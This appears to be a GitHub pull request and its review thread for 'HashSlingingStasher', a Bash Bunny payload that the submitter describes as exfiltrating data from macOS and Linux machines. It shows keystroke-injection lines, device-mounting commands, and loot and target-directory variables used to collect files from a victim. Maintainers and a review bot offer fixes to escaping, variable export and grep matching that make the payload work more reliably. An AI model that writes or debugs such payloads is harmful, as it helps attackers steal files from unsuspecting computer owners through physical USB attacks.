HashSlingingStasher (HSS) Submission #667

Open: wants to merge 7 commits into base: master

theSW4n commented Sep 29, 2023

Version 1.0 submission of the HashSlingingStasher. This is an exfiltration payload for macOS, Ubuntu, Manjaro and Kali Linux.

QUACK STRING "n"
QUACK ENTER
QUACK DELAY 500
QUACK STRING "udisksctl mount -b /dev/disk/by-label/`ls /dev/disk/by-label/ | grep -i BashBunny`"

Member

I would recommend using a variable assignment for the drive label as not everyone's configuration will have the default BashBunny drive label. This makes user configuration much easier.

You can do this by adding it to the top of your payload. For example, with the line:

DRIVE_LABEL="BashBunny"
QUACK STRING "udisksctl mount -b /dev/disk/by-label/`ls /dev/disk/by-label/ | grep -i $DRIVE_LABEL`"

This will result in the Bash Bunny injecting

udisksctl mount -b /dev/disk/by-label/BashBunny

If you want the Bash Bunny to also inject | grep -i BashBunny you need to add escapes. Otherwise the bunny will interpret it as bash. For example:

QUACK STRING "udisksctl mount -b /dev/disk/by-label/\`ls /dev/disk/by-label/ | grep -i $DRIVE_LABEL\`"

This line will result in the Bash Bunny injecting

udisksctl mount -b /dev/disk/by-label/`ls /dev/disk/by-label/ | grep -i BashBunny`

Assuming you modify it to use the variable DRIVE_LABEL for the drive label. Please go through and ensure everything is properly escaped and the variable for DRIVE_LABEL is added.

# Attackmodes: HID, Storage

# Options
hss_target_directory=/

Member

If you want to use this variable inside of your other script, you use export. Exporting the variable allows other scripts to call this variable. For example:

hss_target_directory=/
export hss_target_directory

and then you can call it in another script like normal

$hss_target_directory

# Variables (defined by user in payload.txt)
mountpt=$(mount | grep -i BashBunny | cut -d ' ' -f 3)
lootdir=$mountpt/loot/hss
target_directory=$(grep -hi hss_target_directory $mountpt/HSS/payload.txt | cut -c 22-)
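
Review bot: The target_directory line reads the option with "grep -hi hss_target_directory ... | cut -c 22-", which returns every line in payload.txt that contains that name, so a comment or a second line mentioning the option leaves a multi-line value. Anchor the match to the assignment and take the first hit, for example grep -m1 '^hss_target_directory=' followed by cut -d= -f2-, which also removes the hard-coded column offset. The $mountpt/HSS/payload.txt argument in the same line is unquoted, so a mount point containing a space is split into two arguments; wrap it in double quotes.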

Member

Referencing my comment, you use export. Exporting the variable inside payload.txt allows other scripts to call this variable. For example, you can modify payload.txt with:

hss_target_directory=/
export hss_target_directory

and then you can call it in this script like any other variable.

$hss_target_directory

Please update your variables to use export.
